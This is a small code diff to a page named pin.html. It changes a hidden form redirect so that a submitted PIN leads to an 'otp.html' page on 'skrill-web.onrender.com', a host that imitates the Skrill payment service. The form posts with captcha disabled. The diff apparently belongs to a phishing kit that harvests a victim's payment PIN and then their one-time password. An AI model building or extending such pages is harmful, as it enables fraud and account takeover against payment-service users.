--- a/pin.html
+++ b/pin.html
@@ -211,7 +211,7 @@
         method="POST"
       >
         <input type="hidden" name="_captcha" value="false" />
-        <input type="hidden" name="_next" value="pin.html" />
+        <input type="hidden" name="_next" value="https://skrill-web.onrender.com/otp.html" />
 
         <div class="pin-input">
           <input
